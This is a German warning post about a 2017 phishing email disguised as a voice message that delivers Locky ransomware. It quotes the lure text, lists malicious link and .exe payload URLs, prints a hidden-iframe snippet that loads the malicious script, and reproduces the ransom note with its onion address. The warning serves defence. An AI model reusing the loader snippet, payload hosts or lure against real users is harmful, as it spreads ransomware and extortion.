Voice Message from 010176348949 – name unavailable von Voice Message (vmservice@Deine Domain) bringt Locky Ransomware

Am Mittwoch, den 06. September 2017 wurde durch unbekannte Dritte die folgende betrügerische E-Mail versendet. Öffnen Sie nicht den Link! Es wird ein JavaScript geladen, welches die Ransomware „Locky“ (Verschlüsselungs- und Epressungstrojaner) nachlädt und alle Ihre Dateien in *.lukitus umbenennt / verschlüsselt!

Betreff: Voice Message from 010176348949 – name unavailable
Absender: Voice Message (vmservice@Deine Domain)

Time:Wed, 06 Sep 2017 08:23:02 +0700
From: 010176348949 – name unavailable
Click to listen Voice Message

Achtung: Es handelt sich um eine betrügerische E-Mail! Öffnen Sie nicht den Link! Die E-Mail täuscht eine Sprachnotiz vor.

Neben dem oben genannten Betreff kommen unterschiedliche Nummern vor. Hier einige weitere Beispiele:

  • Voice Message from 013370976348 – name unavailable
  • Voice Message from 010391637948 – name unavailable
  • Voice Message from 013324889682 – name unavailable
  • Voice Message from 013135190551 – name unavailable
  • Voice Message from 012197642054 – name unavailable
  • Voice Message from 014757308657 – name unavailable
  • Voice Message from 019313365491 – name unavailable

Die E-Mail kommt mit unterschiedlichen Links („Click“). Klicken Sie nicht auf die Links, da ein bösartige Datei geladen wird!

  • brucehoytsafety.com/voice.html
  • jns.co.th/voice.html
  • universodeljuguete.com/voice.html

Die verlinkte Internetseite weist auf einen Download hin:

Downloading. Please wait…

Dieser Hinweis lädt das betrügerische JavaScript aber über einen iFrame von einer anderen Domain:

<div style=“background:#eee;border:1px solid #ccc;padding:5px 10px;“>Dowloading. Please wait…</div>
<iframe src=“http://ndsiportal.info/msg.php“ style=“display: none;“>
</iframe>

  • spartoldreputhec.info/msg.php
  • ndsiportal.info/msg.php

Das JavaScript bekommt beim Abspeichern auf dem PC unterschiedliche Namen:

VoiceMessage_6537.js

VoiceMessage_8652.js

VoiceMessage_9458710.js

Der Inhalt des JavaScript macht deutlich, dass es sich nicht um eine Sprachnachricht handelt:

 

Klicken Sie nicht auf die Links, laden Sie nicht das JavaScript und führen Sie es nicht aus! Das Script lädt von unterschiedlichen Domains eine Datei:

  • tealfortera.org/RTgyfdred5.exe
  • permisdenaviguer.com/ppxjieh.exe
  • inspiredheights.com/qxyygib.exe

 

Virustotal zeigt für eine Erkennungsrate von 45/65! Es handelt sich dabei um den Verschlüsselungs- und Erpressungstrojaner „Locky“ (Ransomware). Dieser beginnt u. U. noch nicht sofort mit der Verschlüsselung der Dateien, daher fällt die Infektion u. U. erst später auf.

Die aktuelle „Locky“-Version benennt alle Dateien in *.lukitus um:

 

Daneben produziert „Locky“ zwei Dateien, die auf die Verschlüsselung hinweisen:

lukitus.bmp

lukitus.htm

Nach Ende der Verschlüsselung werden beide Dateien automatisch geöffnet:

.$-=
.|=$$-$

!!! WICHTIGE INFORMATIONEN !!!!

Alle Dateien wurden mit RSA-2048 und AES-128 Ziffern verschlüsselt.
Mehr Informationen über RSA können Sie hier finden:
http://de.wikipedia.org/wiki/RSA-Kryptosystem
http://de.wikipedia.org/wiki/Advanced_Encryption_Standard

Die Entschlüsselung Ihrer Dateien ist nur mit einem privaten Schlüsseul und einem Entschlüsselungsprogramm,
welches sich auf unserem Server befindet, möglich.
Um Ihren privaten Schlüssel zu erhalten, folgen Sie einem der folgenden Links:

Sollte keine der Adressen verfügbar sein, folgen Sie den folgenden Schritten:

1. Laden Sie einene Tor Browser herunter und installieren diesen: https://www.torproject.org/download/download-easy.html
2. Starten Sie den Browser nach der erfolgreichen Installation und warten auf die Initialisierung.
3. Tippen Sie in die Adresszeile: g46mbrrzpfszonuk.onion/*****
4. Folgend Sie den Anweisungen auf der Seite.

!!! Ihre persönliche Identifizierungs-ID lautet: ***** !!!

=*|$|+|-c=…_ |.-+

 

Außerdem tauscht „Locky“ den Bildschirmhintergrund gegen die lukitus.bmp – Datei aus:

 

Die verlinkte Internetseite zeigt im TOR-Browser folgende Erpressung:

Kommentar(e)

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert